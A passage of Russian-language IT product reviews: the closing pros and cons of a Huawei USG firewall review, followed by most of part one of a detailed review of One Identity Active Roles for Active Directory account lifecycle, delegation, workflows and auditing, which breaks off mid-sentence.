UTM-решений, можно точно сказать, что линейка продуктов Huawei USG во многом соответствует предъявляемым требованиям. Однако следует помнить, что «серебряной пули» в ИБ не существует, и даже очень известные и популярные представители рынка имеют свои преимущества и недостатки.Продукты компании Huawei постоянно развиваются, поэтому хотелось бы упомянуть о планах по развитию продукта. Достаточно скоро в рассматриваемую линейку продуктов Huawei USG 6000 будет добавлена поддержка следующих функций:SNORT семантики для IPS — модуля предотвращения вторжений — появится в середине 2019 года. Востребованность этой функциональности обоснована потребностью у заказчика подгружать правила обнаружения и предотвращения вторжений в другие межсетевые экраны нового поколения в дополнение к существующим;поддержка ICAP-протокола, который в большинстве случаев используется для сканирования на вирусы проходящего трафика и применения к нему различных контент-фильтров. По заявлению вендора, появится эта функциональность летом 2019 года, с новым релизом. Добавление обусловлено распространенностью именно на нашем рынке ввиду интеграций отечественных решений по ICAP.ПреимуществаУдобный интуитивно понятный и быстрый web-интерфейс.Сертифицирован ФСТЭК России.Гибкие возможности настройки интерфейсов, маршрутизации.Широкий скоп функциональности контентной безопасности.Различные варианты аутентификации пользователей.Возможность гибко по мере возможности наращивать функциональность за счет подключения дополнительных программно-аппаратных комплексов (песочница, система обнаружения вторжений).НедостаткиОтсутствие русскоязычного интерфейса.Минимальное количество русскоязычной технической литературы (руководства, методички и т. д.).Автор благодарит компанию-дистрибьютора «Ландата» за предоставленный стенд.
Обзор One Identity Active Roles. Часть 1
April 8, 2019, 4:17 am

Active Roles компании One Identity — это платформа для эффективного управления учетными записями Active Directory и правами доступа в связанных с ним сервисах компании Microsoft, таких как Exchange, Skype for Business, SharePoint, включая их облачные версии — Azure Active Directory и Office 365. Active Roles может быть использован в качестве легкой платформы IDM/IGA для управления идентификационными данными пользователей в компаниях среднего размера. ВведениеИстория возникновения и развития продукта One Identity Active RolesАрхитектура Active RolesПользовательский интерфейсФункциональные возможности Active Roles5.1. Обеспечение жизненного цикла учетных записей пользователей5.2. Контроль содержимого атрибутов объектов5.3. Репозиторий скриптов5.4. Рабочие процессы5.5. Назначение прав доступа и полномочий5.5.1. Разграничение прав доступа и полномочий к объектам и системам при помощи Active Roles5.5.2. Контроль членства в группах Active Directory5.5.3. Профиль полномочий5.5.4. Управляемые ресурсы5.6. Средства интеграции с другими системами5.7. Аудит и отчетность5.8. Расширение функциональности Active RolesВыводы ВведениеC 2003 года заказчиками и пользователями Active Roles компании One Identity являются более 2500 мировых компаний. Размеры внедрений варьируются от 250 до 800+ тысяч учетных записей в каталоге Active Directory.Продукт Active Roles многогранен. Он может быть использован в качестве легкой платформы для управления идентификационными данными пользователей в компании — light-weight IDM с быстрым циклом внедрения. Внедрение Active Roles в такой ипостаси может быть первым шагом для компаний в направлении Identity Management / Identity Governance (IDM/IGA). Классические функции IDM-решения доступны в Active Roles при помощи функций жизненного цикла учетных записей пользователей, контроля атрибутов объектов, управления членством в группах Active Directory и др.С другой стороны, Active Roles может позиционироваться как специализированный инструмент для безопасного управления средой Active Directory даже для компаний, у которых уже есть общее IDM-решение. В этом случае Active Roles будет дополнительной серьезной защитой периметра Active Directory и связанных с ним систем, что значительно повысит общий уровень безопасности информационной среды компании. Рисунок 1. Позиционирование продукта One Identity Active Roles История возникновения и развития продукта One Identity Active RolesПервые версии продукта вышли в свет давно. В начале 2000-х годов компания Aelita Software, основной офис разработки которой находился в Санкт-Петербурге, выпустила на рынок продукт под названием Enterprise Directory Manager (EDM), предназначенный в первую очередь для безопасного и контролируемого управления средами на основе каталога Microsoft Active Directory и автоматизации ручных операций управления. Продукт быстро стал очень популярным на западном рынке. Ключевыми заказчиками являлись компании enterprise-уровня: средние и крупные коммерческие, промышленные, финансовые компании (банки), компании госсектора, которые остаются клиентами One Identity и поныне. Служба каталога Active Directory тогда еще только начинала бурно развиваться и захватывать рынок, решение для эффективного управления ею появилось как раз вовремя.В 2004-м году компания Quest Software приобрела компанию Aelita Software со всеми ее активами. Продукт Enterprise Directory Manager был переименован в Active Roles Server. Череда дальнейших приобретений — в 2012 году Quest Software (в том числе One Identity как ее составная часть) была куплена компанией Dell, в рамках которой было создано подразделение Dell Software. Но в конце 2016 года появилась новая, самостоятельная компания One Identity, флагманским продуктом которой является система управления идентификацией и доступом One Identity Manager — ее мы подробно рассматривали и описывали в наших предыдущих обзорах (часть 1, часть 2, часть 3). Продукт Active Roles также принадлежит компании One Identity и продолжает активно развиваться (текущая версия продукта — 7.3.1). Ему мы и посвятим наш текущий обзор. Архитектура Active RolesКлючевой особенностью Active Roles является то, что продукт, будучи ориентирован на работу c каталогом Active Directory, никоим образом не хранит в себе (в своей конфигурационной базе) «копию» Active Directory. Работа ведется с живым Active Directory, напрямую. Но все операции, которые будут выполняться над объектами Active Directory через интерфейсы Active Roles, — в ручном режиме или автоматически — полностью контролируются сервисом Active Roles в реальном времени. Таким образом, Active Roles является некой надстройкой, прокси-сервисом, виртуальным фаерволом — можно назвать по-разному, над службой каталога Active Directory компании. О преимуществах такого подхода (прокси-администрирования) и возможностях, которые он дает, мы более подробно поговорим в статье ниже.Конфигурационная база продукта (на Microsoft SQL Server) содержит только настройки. Она не является сильно нагруженной, ее объем относительно невелик. Рисунок 2. Функциональная диаграмма продукта One Identity Active Roles Такая архитектура дает ряд преимуществ. Одно из них — практически неограниченная масштабируемость. Active Roles прекрасно работает как с маленькими, так и с огромными по количеству объектов средами Active Directory. Среди заказчиков One Identity, которые используют Active Roles для управления своим Active Directory, много таких, служба каталога которых насчитывает сотни тысяч учетных записей пользователей. Здесь стоит также отметить, что никаких ограничений по количеству лесов Active Directory, подключенных к решению Active Roles, количеству доменов в этих лесах, у продукта Active Roles нет. Наличие или отсутствие доверительных отношений между лесами и доменами также роли не играет.Продукт не требует расширения схемы Active Directory. С другой стороны, он прекрасно работает со средами, где схема Active Directory была расширена. Единственное требование — это наличие так называемого функционального аккаунта (на рисунке 2 — func_accnt), который будет использоваться сервисом Active Roles Administration Service для выполнения всех операций в домене (ручных — от имени конечного пользователя либо автоматических). Данный функциональный аккаунт обычно наделяют административными правами в Active Directory. Для каждого управляемого домена (т. е. домена, зарегистрированного для управления в Active Roles) можно указать свой собственный функциональный аккаунт.Сервис Active Roles Administration Service устанавливается на стандартный сервер под управлением операционной системы Microsoft Windows (2008/2012/2016). Входящий в состав продукта тонкий клиент (веб-интерфейс) требует установки серверной части приложения на Microsoft Internet Information Server (IIS). Как мы уже упомянули, для конфигурационной базы данных используется Microsoft SQL Server (2008/2012/1014/2016/2017). В продуктивной среде рекомендуется использовать отказоустойчивые решения для базы данных Active Roles, такие как Microsoft Cluster Services или SQL AlwaysOn. Для отказоустойчивости и «географического» масштабирования также обычно устанавливают несколько сервисов Active Roles Administration Service, работающих с одной и той же конфигурационной базой. Пользовательский интерфейсДля работы пользователей Active Roles предлагает два типа графических интерфейсов: так называемые толстый — на основе технологии Microsoft Management Console (MMC) и тонкий — веб-интерфейс. Оба интерфейса являются полнофункциональными, они работают с Active Directory и другими системами через один и тот же сервис Active Roles Administration Service. Основное отличие в функциональности заключается в том, что настройка продукта осуществляется в основном через MMC-интерфейс. Однако веб-интерфейс является значительно более гибким в плане практической работы, его очень легко кастомизировать (подстраивать) под свои нужды (менять существующие, добавлять собственные формы, команды, поля, настраивать видимость элементов, менять последовательность действий при выполнении каких-то операций, менять внешний облик и т. д.).MMC-интерфейсMMC-клиент Active Roles очень похож на всем знакомый Active Directory Users and Computers (ADUC), входящий в комплект стандартной поставки Microsoft Windows. Вид каталога Active Directory, свойства объектов, принцип выполнения действий над ними и пр. выглядят практически одинаково. Никакого обучения использованию нового клиента для администрирования Active Directory (а также Exchange, Skype for Business) не потребуется.Веб-интерфейсКак мы уже упоминали, веб-приложение тонкого клиента Active Roles базируется на Microsoft Internet Information Server (IIS). Для работы с ним официально поддерживаются следующие интернет-обозреватели:Firefox (версии 36 и выше) на WindowsGoogle Chrome (версии 61 и выше) на WindowsWindows Internet Explorer 11Microsoft Edge на Windows 10В комплект поставки входят три базовые конфигурации веб-интерфейса (для администраторов, операторов службы хелпдеск и для самообслуживания), каждую их которых можно кастомизировать, либо создать свой собственный веб-интерфейс, используя одну из существующих конфигураций в качестве шаблона. Кастомизация веб-интерфейса не требует навыков программирования и осуществляется прямо из самого веб-клиента. Более подробно о возможностях настройки веб-интерфейса раздел «Расширение функциональности» ниже.ЛокализацияДистрибутив Active Roles включает в себя языковой пакет для локализации веб-интерфейса продукта. В языковой пакет входят 14 языков, включая русский. Рисунок 3. Поддержка языков в продукте Active Roles Функциональные возможности Active RolesВ Active Roles заложено множество функций. Коротко, в общих чертах, их можно описать следующим списком:Безопасное и контролируемое управление объектами в каталоге Active Directory. Этому способствуют:Проверка эффективных прав доступа в режиме реального времени (т.е. в момент проведения какой-либо операции).Гранулярное назначение (делегирование) прав доступа сотрудникам к объектам Active Directory (Exchange, Azure Active Directory, Office 365) на уровне атрибутов через настраиваемые шаблоны.Отзыв избыточных прав доступа, их вычистка из Active Directory.Наглядность и прозрачность назначения прав доступа. Абстрагирование от иерархической структуры каталога Active Directory — возможность использования динамических выборок нужных объектов и назначения прав доступа к ним.Следование и соответствие модели «минимально необходимого набора прав доступа» (least-privilege access model) при разграничении прав доступа к ресурсам и полномочий для выполнения тех или иных задач.Полный, подробный аудит действий пользователей и отчетностьОбеспечение целостности и должного качества данных в Active Directory (в атрибутах объектов) при помощи настраиваемых политик.Стандартизация и контроль действий при помощи настраиваемых рабочих процессов (workflow) с возможностью затребовать подтверждение третьих лиц перед внесением изменений (выполнением операции) — согласование изменений.Обеспечение жизненного цикла учетных записей пользователей: автоматизация процессов приема сотрудников на работу, кадрового перевода, увольнения с сопутствующей автоматической перенастройкой прав доступа, блокировкой учетных записей.Динамически настраиваемый веб-интерфейс под нужды каждой конкретной группы пользователей (администраторов, операторов службы поддержки, рядовых пользователей, руководителей, владельцев ресурсов, систем, серверов и т. п.) — без необходимости кодирования (скриптинга).Некоторые из упомянутых практических аспектов использования продукта мы более подробно рассмотрим ниже.Обеспечение жизненного цикла учетных записей пользователейActive Roles позволяет организовать полноценный жизненный цикл учетных записей сотрудников, включая такие базовые процессы как прием сотрудника на работу, кадровый перевод и увольнение. В западной литературе данные кадровые события часто обозначают аббревиатурой JML — Joiners, Movers, Leavers. Им соответствуют процессы provisioning, update и de-provisioning.При помощи встроенного механизма синхронизации данных между Active Directory и сторонними системами (например, с источником кадровых данных) эти операции можно полностью автоматизировать. Подробнее подсистема синхронизации данных описана в разделе «Средства интеграции с другими системами» ниже.Сценарий «Прием нового сотрудника на работу»В качестве примера рассмотрим такой сценарий: при создании новой учетной записи пользователя (например, при приеме нового сотрудника на работу), необходимо, чтобы:Логон-имя учетной записи (sAMAccountName) был создан по шаблону: <первая буква имени>+ Для дубликатов (Иван Иванов…) автоматически использован суффикс (001, 002…)Создан случайный временный пароль из 8-ми символовОбязательно указан:отдел, в который принимается сотрудник (выбор из списка допустимых значений)офис (филиал), в котором будет работать сотрудник (выбор из списка)табельный номер (по формату – 8 цифр)занимаемая должностьАвтоматически создан почтовый алиас (mailnickname) и, соответственно, почтовый адрес согласно шаблона . с обработкой дубликатовАвтоматически создан почтовый ящик на сервере Microsoft Exchange, находящемся в регионе указанного филиалаУчетная запись создана в контейнере Active Directory, соответствующем отделу, в который принимается сотрудникУчетная запись автоматически добавлена в группы доступа и списки рассылки Active Directory согласно членства сотрудника в отделе, занимаемой должности и географического положенияСоздана домашняя папка на файловом сервере, который находится в регионе сотрудника а также предоставлен полный доступ к данной папке для его учетной записиДанный сценарий и ему подобные легко реализуются в продукте Active Roles при помощи объектов политик (Active Roles Policy Objects). Политики включают в себя набор правил (действий) которые необходимо выполнить. Все настройки правил осуществляются в продуманном графическом интерфейсе и не требуют написания скриптов, хотя при необходимости, в политику можно добавить и выполнение скриптовых операций. Рисунок 4. Настройка объекта политики в Active Roles для операций первичного создания учетной записи пользователя Подготовленный объект политики далее связывается с контейнерами Active Directory либо с динамическими контейнерами (в терминологии Active Roles они называются «управляемые единицы» — Managed Units). Правила, заданные в политике, начинают действовать немедленно, после сохранения изменений в объекте политики.Дополнительно функциональность так называемых динамических групп используется для автоматической настройки членства учетной записи в группах Active Directory.Сценарий «Кадровый перевод»При переводе сотрудника из одного подразделения компании в другое либо, например, при смене должности обычно требуется перенастроить его текущие права доступа и полномочия согласно его новой роли в компании, а также провести ряд административных действий с учетной записью пользователя. Данный сценарий может включать в себя следующие шаги:Убрать учетную запись пользователя из «старых» групп безопасности и списков рассылки (т.е. связанных с его старым отделом или должностью).Добавить учетную запись в группы, связанные с его новым отделом/должностью.Изменить значения атрибутов «Отдел», «Должность», «Офис» и другие (выбор разрешенных значений из списка).При смене офиса — автоматически поменять почтовый адрес (на новый).Переместить учетную запись в контейнер Active Directory, связанный с его новым отделом.Все данные изменения полностью автоматизируются в Active Roles при помощи тех же самых объектов политик. В дополнение к этому функциональность динамических групп используется для автоматической перенастройки членства в группах Active Directory.Сценарий «Увольнение»При уходе сотрудника из компании (увольнении) обычно также проводится ряд административных действий, таких как:Блокировка учетных записей сотрудника в системах.Перемещение учетной записи Active Directory в другой контейнер (Блокированные учетные записи, ожидающие удаления через определенный срок).Переименование учетной записи, добавление описания (изменение description).Удаление учетной записи из групп безопасности и списков рассылки.Очистка атрибутов (выборочно).Удаление почтового ящика из «Адресной книги».Установка автоответчика (Out-of-Office).Перенаправление почты на другой почтовый ящик.Все эти действия, а также многие другие полностью автоматизируются в Active Roles при помощи тех же самых объектов политик. Рисунок 5. Настройка объекта политики в Active Roles для операций блокировки доступаКонтроль содержимого атрибутов объектовПри помощи набора правил, которые объединяются в объектах политик — Active Roles Policy Objects, можно контролировать содержимое любых атрибутов объектов, включая генерацию этих значений (например, при создании объекта).Политики в Active Roles могут быть двух типов:Provisioning PoliciesDe-provisioning PoliciesПервые действуют при операциях создания объектов и изменения их свойств (т. е. используются в таких сценариях, как «прием нового сотрудника на работу», «кадровый перевод»), вторые — при блокировках (сценарий «увольнение»).Набор правил, которые можно использовать в политиках, достаточно широк. В случаях же, когда встроенных средств настройки правил недостаточно, всегда можно использовать правило script execution. В дополнение к этому продукт поддерживает расширение политик через создание Policy Extension (добавление новых типов правил). Это удобно, т. к. позволяет использовать их многократно, в разных объектах политик, при этом унифицировав их настройку через графический интерфейс.В качестве примера — реализация следующего сценария при помощи политик Active Roles:Атрибут «Офис» учетной записи сотрудника должен принимать только определенные значения (из списка).Список разрешенных значений атрибутов необходимо взять из внешнего источника (например, прочитать из текстового файла или из базы данных).Значение должно выбираться из выпадающего списка (без возможности задания произвольного значения).Результат действия политики после ее применения в толстом клиенте будет выглядеть следующим образом: Рисунок 6. Обзор свойств учетной записи пользователя в MMC-интерфейсе Active Roles В тонком клиенте: Рисунок 7. Обзор свойств учетной записи пользователя в веб-интерфейсе Active Roles Выпадающий список формируется автоматически. Никаких действий по кастомизации форм производить не требуется.Как уже было отмечено, Active Roles полностью поддерживает использование скриптов (VB, Jscript, Perl, PowerShell) в рамках политик, а также предоставляет программный интерфейс (API) для создания новых типов политик (Policy Types) и их расширений (Policy Extensions). Рисунок 8. Пример настройки скриптовой политики в Active Roles Программный интерфейс (API), предоставляемый продуктом Active Roles, более подробно рассмотрен в разделе Software Development Kit ниже. Репозиторий скриптовActive Roles поддерживает выполнение скриптов (VB, Pearl, PowerShell) как в рамках рабочих процессов, так и в рамках применения объектов политик. Это позволяет использовать платформу Active Roles для консолидации разрозненных скриптовых решений, которые с большой долей вероятности используются в продуктивной среде для автоматизации тех или иных задач. Это позволит обеспечить полный контроль за модификацией и работой скриптовых решений, а также лучшую организацию и прозрачность процессов. Рисунок 9. Консолидация скриптов в Active Roles — «скриптинг-центр»Рабочие процессыActive Roles содержит в себе унифицированный механизм организации и выполнения рабочих процессов (workflow). Данный механизм не требует написания кода (скриптинга) и предлагает очень гибкие настройки. Напротив, нужный процесс может быть настроен при помощи графического интерфейса. С другой стороны, в продукте нет никаких ограничений на использование скриптов, в частности, в рамках рабочих процессов. Рисунок 10. Пример настройки рабочего процесса в Active Roles Рабочие процессы Active Roles могут быть двух типов:Стартующие по событиюСтартующие по расписаниюРассмотрим их более подробно, на примерах.Согласование измененийОдним из самых распространенных примеров рабочего процесса по событию является запуск процесса согласования при изменении тех или иных атрибутов объекта (например, членства в группе). В общем же случае триггером рабочего процесса может быть любое изменение (создание, изменение, удаление) любого типа объектов с последующим выполнением действий согласно настроенной цепочке. Здесь на любом шаге поддерживается ветвление по условию, выполнение скриптов и возвращение результата, поиск нужных объектов по параметрам, назначение ответственных (например, указание или вычисление списка согласующих для данного шага) и т. п. Рисунок 11. Запрос на согласование изменений в веб-интерфейсе Active Roles Согласование изменений выполняется при помощи веб-интерфейса Active Roles. Каждый согласующий (например, сотрудник, который был назначен владельцем объекта — основным или дополнительным) получит уведомление об изменении, которое он может подтвердить или отклонить, зайдя в веб-интерфейс и проведя анализ. Только после одобрения данное изменение вступит в силу. Рисунок 12. Заявка на согласование в веб-интерфейсе Active Roles Рисунок 13. Согласование изменения в веб-интерфейсе Active Roles Автоматизация процессовВторой тип рабочих процессов позволяет автоматизировать часть ежедневных задач администрирования Active Directory и связанных с ним систем. Настроенные рабочие процессы в этом случае запускаются по заданному расписанию и выполняют некую цепочку действий. В качестве примера можно привести такие процессы, как «найти все учетные записи пользователей, которые не заходили в систему в течение 60 дней, их заблокировать, переместить в определенный контейнер в Active Directory и переслать полный отчет администратору». Данный тип рабочих процессов является хорошей альтернативой запуску отдельных скриптов, т.к. в этом случае продукт Active Roles также ведет полный аудит действий в системе. Т.е. всегда можно отследить, как и почему было произведено то или иное действие, изменен тот или иной объект. Ну и сама логика выполнения каких-то процессов, а также их результат становятся прозрачными и понятными.Назначение прав доступа и полномочийРазграничение прав доступа и полномочий к объектам и системам при помощи Active RolesВ терминологии Active Roles предоставление каких-либо прав на выполнение действий над объектами Active Directory (и связанных с ним систем) называется «Делегированием» (Delegation). Суть его в следующем.Благодаря используемой в продукте архитектуре прокси-администрирования (когда все действия в Active Directory выполняются сервисным/функциональным аккаунтом от имени делегированного пользователя — инициатора) отпадает необходимость назначать права доступа тем или иным конечным пользователям напрямую в Active Directory (т. е. модифицировать дескрипторы безопасности объектов Active Directory, будь то organizational units или конечные объекты) — хотя Active Roles никоим образом этого делать не запрещает. Вместо этого необходимые права доступа можно выдать пользователю «внутри» Active Roles, используя шаблоны доступа (Access Templates). В этом случае учетная запись пользователя может не иметь каких-то административных полномочий в самом Active Directory (через членство в административных группах Active Directory, например Domain Admins), но при этом пользователь будет иметь возможность выполнять те или иные привилегированные действия с объектами (разрешенные ему в назначенных шаблонах доступа) через интерфейсы Active Roles. Т. е. продукт по сути позволяет оставить учетные записи пользователей, которым нужны повышенные привилегии в Active Directory — в группе Domain Users (наряду со всеми остальными пользователями) и выдать им необходимые права доступа в Active Roles. Помимо более гибкого и назначения прав доступа и эффективного контроля это позволяет избежать необходимости создания дополнительных «административных» учетных записей сотрудникам (и добавления их в Domain Admins). Тем самым обеспечивается:Прозрачность — всегда можно понять, кто, к каким объектам и какие права доступа имеет.Безопасность — делегированные пользователи будут видеть только те объекты, к которым у них есть фактические права (и не увидят все остальные).Эффективный контроль — права доступа проверяются сервисом Active Roles при выполнении каждого действия над любым объектом.Делегирование прав доступа в продукте осуществляется через MMC-интерфейс по команде Delegate Control: Рисунок 14. Делегирование прав доступа в MMC-интерфейсе Active Roles Далее выбирается учетная запись сотрудника или группа Active Directory, которой нужно предоставить права, шаблон доступа (т. е. какие права нужно предоставить) и объект Active Directory, на который нужно дать права (Organizational Unit), либо динамическая выборка объектов (Managed Unit) — еще один интересный вид объектов Active Roles, позволяющий при выдаче прав доступа (Delegate Control) и применении политик Active Roles (Enforce Policy) абстрагироваться от физической структуры каталога Active Directory. В момент делегирования прав также указывается, нужно ли выдать права только внутри Active Roles, или же синхронизировать их в живой Active Directory (native security).Особо отметим, что все права доступа, делегированные тем или иным сотрудникам в Active Roles через шаблоны доступа, в любой момент можно перенести (синхронизировать) в Active Directory — в этом случае делегированный сотрудник сможет выполнять те же действия, указанные в шаблоне, через стандартную оснастку Active Directory Users and Computers. Также в любой момент можно забрать права из Active Directory обратно, оставив их только в Active Roles. Рисунок 15. Выбор режима синхронизации прав доступа из шаблона Active Roles в Active Directory Вообще системе безопасности Active Roles стоило бы посвятить отдельную статью. Это одно из ключевых свойств продукта Active Roles, за что его так любят многие корпоративные заказчики, ставящие целью обеспечить эффективное разграничение прав доступа и полномочий внутри своей инфраструктуры на основе Active Directory (включая Exchange, SharePoint и другие зависимые системы).Контроль членства в группах Active DirectoryГруппы безопасности Active Directory (security group) наиболее часто используются для предоставления тех или иных прав сотруднику как в самом Active Directory, так и в других системах, использующих Active Directory в целях аутентификации и авторизации пользователей. Таким образом, управление членством в группах Active Directory — достаточно важный аспект управления доступом в информационной среде компании.Наряду с группами безопасности, использование групп рассылки (distribution group) также является важным с точки зрения, кто и какую информацию будет получать в компании по электронной почте. Поэтому управление составом списков рассылки также является немаловажным.Помочь с этими задачами, обеспечить эффективное управление членством в группах Active Directory может следующая функциональность Active Roles: динамические группы и временное членство в группах. Рассмотрим их подробнее.Динамические правила членства в группахВ терминологии Active Roles данная функциональность называется просто — Динамические группы (Dynamic Groups). Смысл в следующем. В консоли Active Roles можно выбрать любую группу Active Directory и задать для нее правила (критерии) членства других объектов в данной группе. Например: включать в группу только сотрудников, у которых атрибут «Отдел» (department) содержит значения «Отдел кадров», «Бухгалтерия» и «Отдел снабжения». Рисунок 16. Настройка динамических правил членства в группе Active Directory Рисунок 17. Варианты динамических правил членства в группе Active Directory и результат их применения Конечно, это только пример. Можно использовать любые комбинации атрибутов, которые есть в схеме Active Directory и виртуальной схеме Active Roles. Отметим также, что сами динамические правила, как и все остальные настройки Active Roles, хранятся в его конфигурационной базе. Перерасчетом членства в динамических группах занимается сервис Active Roles Administration Service.Выдача прав доступа на времяДля любой группы Active Directory при добавлении в нее учетных записей пользователей администратор (оператор) может указать дату и время, в которое нужно добавить выбранные учетные записи в группу, а также дату и время, когда они должны быть удалены из группы, — функциональность «Временный доступ» (Temporary membership). Рисунок 18. Настройка временного членства в группе Active Directory Active Roles произведет добавление объектов в группу и удаление их из группы в строго указанное время.Профиль полномочийДля каждого сотрудника (учетной записи пользователя) в Active Roles легко можно посмотреть, какими ресурсами и каким полномочиями он обладает — так называемый «Профиль полномочий» (Entitlement Profile). Рисунок 19. Просмотр «профиля разрешений» пользователя в веб-интерфейсе Active RolesУправляемые ресурсыActive Roles для каждого конкретного пользователя также легко позволяет вывести список объектов (учетных записей, групп, других ресурсов), для которых он является владельцем. Рисунок 20. Отображение списка «управляемых ресурсов» для владельца в веб-интерфейсе Active Roles При этом в Active Roles поддерживается назначение как «Основного владельца» (Primary Owner), так и «Дополнительных владельцев» (Secondary Owners).Каждый владелец может видеть все «свои» объекты по команде «Управляемые ресурсы» (Managed Resources) в веб-интерфейсе и производить с ними какие-то действия (разрешенные при помощи функциональности делегирования прав доступа и полномочий). Функциональность назначения владельцев учетных записей, групп и других типов объектов часто используется при настройке процессов согласования. Средства интеграции с другими системамиActive Roles предлагает широкий набор средств для интеграции решения с другими системами, который включает встроенный полнофункциональный сервис синхронизации (Synchronization Service), PowerShell модуль с набором командлетов (Management Shell), а также ряд программных интерфейсов, таких как SPML-провайдер и ADSI-провайдер. Программные интерфейсы и способы интеграции детально, с примерами описаны в Software Development Kit (SDK), который также включен в продукт.Synchronization ServiceВстроенный сервис синхронизации — Active Roles Synchronization Service — позволяет подключаться и работать со следующими типами систем:Microsoft Active Directory Domain Services с функциональным уровнем домена или леса от Windows Server 2008 и выше;Microsoft Active Directory Lightweight Directory Services (AD LDS);Microsoft Exchange Server 2016, 2013 или 2010;Microsoft Lync Server version 2013;Microsoft Skype for Business 2015 или 2016;Microsoft Windows Azure Active Directory (AAD) используя Azure AD Graph API version 1.6;Microsoft Office 365 directory;Microsoft Exchange Online service;Microsoft Skype for Business Online service;Microsoft SharePoint Online service;Microsoft SQL Server — любой версии, поддерживаемой компанией Microsoft;Microsoft SharePoint 2016 или 2013;One Identity Manager version 7.х и 8.х;любые другие источники данных, доступные через OLE DB provider;файлы с разделителями (delimited text files) — CSV. Рисунок 21. Выбор коннектора в сервисе синхронизации Active Roles Synchronization Service Таким образом, при помощи встроенного сервиса синхронизации очень легко автоматизировать процесс жизненного цикла учетных записей. Под каждый сценарий («прием нового сотрудника на работу», «кадровый перевод», «увольнение») в рамках рабочего процесса синхронизации заводится шаг, соответствующий процедуре provisioning, update или de-provisioning: Рисунок 22. Пример рабочего процесса «жизненного цикла учетных записей сотрудников» в сервисе синхронизации Active Roles Synchronization Service Здесь особо стоит отметить, что все правила, которые были заданы и применены при помощи объектов политик Active Roles для ручного создания учетных записей (см., например, сценарий «прием нового сотрудника на работу»), модификации и блокировки — эти же самые политики будут применяться и при автоматическом создании, модификации и блокировке учетных записей во время синхронизации. То же самое касается и автоматического добавления учетных записей в группы Active Directory через динамические правила, они будут работать точно так же, как и при ручных операциях. Отсутствие дублирования настроек (для ручных и автоматических операций) облегчает настройку и делает решение более стройным.Management ShellActive Roles включает в себя набор собственных командлетов PowerShell для управления конфигурацией самого продукта, так и объектами Active Directory. Все командлеты имеют префикс QAD-, они появились еще до того, как компания Microsoft выпустила свой собственный набор командлетов для работы с объектами Active Directory. Рисунок 23. Active Roles Management Shell SPML ProviderПозволяет осуществить взаимодействие с сервисом Active Roles (для проведения каких-то действий над объектами Active Directory и связанных с ним систем) используя механизм веб-сервисов по протоколу Service Provisioning Markup Language (SPML) version 2 — т. е. путем обмена XML-документами в стандартном формате Simple Object Access Protocol (SOAP-запросами).Веб-сервис SPML-провайдера Active Roles описан в Web Services Description Language (WSDL) — файле, доступном по ссылке http:///ARServerSPML/SPMLProvider.asmx?WSDL. Полное описание функциональности и настройки SPML-провайдера Active Roles можно найти в прилагающейся к продукту документации.ADSI ProviderActive Directory Services Interface (ADSI) Provider, присутствующий в Active Roles, позволяет использовать стандартный интерфейс Microsoft ADSI 2.5 для взаимодействия с сервисом Active Roles из сторонних приложений, скриптов и пользовательских интерфейсов, включая веб-приложения, которые используют Active Server Pages (ASP). В дополнение к этому ADSI-провайдер Active Roles поддерживает стандартный, системный провайдер OLE DB. Таким образом, OLE DB и ActiveX Data Objects (ADO) могут использоваться для запросов к сервису Active Directory через сервис Active Roles.Примеры использования ADSI-провайдера Active Roles подробно описаны в прилагающемся к продукту Software Developer Kit (SDK).Software Development Kit (SDK)Включен в дистрибутив поставки Active Roles. Содержит в себе всю необходимую информацию для разработки программных решений под платформу Active Roles, расширения его функциональности и интеграции с другими системами. Рисунок 24. Active Roles Software Development KitАудит и отчетностьЛюбые операции, осуществляемые через интерфейсы Active Roles (как из графических клиентов, так и через программные интерфейсы — например, SPML, ADSI), журналируются. Уровень журналирования очень детальный, но при этом понятный и читаемый. Для проведения аудита действий пользователей и изменений объектов Active Roles предлагает целый набор средств:Просмотр истории изменения объектов — доступен из графического интерфейса (толстый и тонкий клиент), в любое время по кнопке мыши.Анализ активности пользователя — какие операции над какими объектами проводил тот или иной сотрудник, также доступен в любое время в графическом интерфейсе.Полный журнал всех операций над объектами по всем системам, включая сам Active Roles (конфигурацию, операционную активность и пр.).Набор готовых отчетов (Report Pack).История изменений объектаПолная история изменений объекта доступна в Active Roles по клику мышки: нужно просто выбрать объект и нажать «Журнал изменений» (Change History). После этого на экран будет выведена информация обо всех операциях над объектом, в каком порядке и кем они были проведены, с полной детализацией (вплоть до значений атрибутов «до» и «после»). Рисунок 25. Отображение «журнала изменений» объекта в MMC-интерфейсе Active Roles Рисунок 26. Отображение «журнала изменений» объекта в веб-интерфейсе Active Roles Аудит действий пользователяПомимо аудита изменений объектов Active Directory (и связанных с ним систем) в Active Roles доступен аудит действий (т. е. кто и что делал, над каким объектами) — по команде «Действия пользователей» (User Activity). Рисунок 27. Отображение информации об активности пользователя в веб-интерфейсе Active Roles Журналирование операцийВсе операции, производимые через интерфейсы Active Roles (включая программные), протоколируются. Active Roles Administration Service ведет в системе свой собственный, одноименный журнал — он доступен в любое время через оснастку «Просмотр журнала событий» (Event Viewer) и может быть сохранен в стандартном .evt формате. Рисунок 28. Журнал событий сервиса Active Roles Administration Service в консоли Event Viewer У любой операции есть поле «Инициатор» (Initiator), которое показывает, кто именно выполнил данную операцию, будучи авторизованным в Active Roles.Данный журнал событий — это полный источник аудит-информации. Благодаря стандартному формату его при необходимости можно легко подключить и использовать в любой SEIM-системе.ОтчетностьВ состав продукта Active Roles входит пакет готовых отчетов (Report Pack) с возможностью создания собственных отчетов по требованию.Расширение функциональности Active RolesВиртуальная схема и виртуальные атрибутыПри старте Сервис Active Roles Administration Service полностью вычитывает (кеширует в своей памяти) схему всех доменов, зарегистрированных для управления через данный сервис в данный момент. Т. е. абсолютно все атрибуты всех классов объектов, которые есть в физической, реальной схеме каждого домена, доступны для управления сервису.Помимо этого, в Active Roles можно создать и использовать свои собственные атрибуты, также для любого класса объектов — вместо расширения физической, реальной схемы Active Directory. Это так называемые виртуальные атрибуты (виртуальная схема). Для сервиса Active Roles нет никакой разницы, является ли атрибут реальным (присутствует в живой схеме Active Directory) или виртуальным (присутствует только в конфигурации Active Roles).Виртуальная схема (виртуальные атрибуты) широко используются для расширения функциональности продукта, кастомных решений и сценариев. Они удобны, т. к. не требуют расширения живой схемы Active Directory.Кастомизация веб-интерфейсаФункциональность изменения веб-интерфейса (изменение существующих форм или создание новых, добавление, удаление атрибутов, команд, полей на формах, ребрендинг и др.) не требует кодирования. Все настройки осуществляются администратором напрямую в самом веб-интерфейсе по ссылке Customize (доступной только администратору). После внесения изменений все, что необходимо сделать администратору, — это кликнуть ссылку Reload на странице, чтобы обновить настройки приложения на 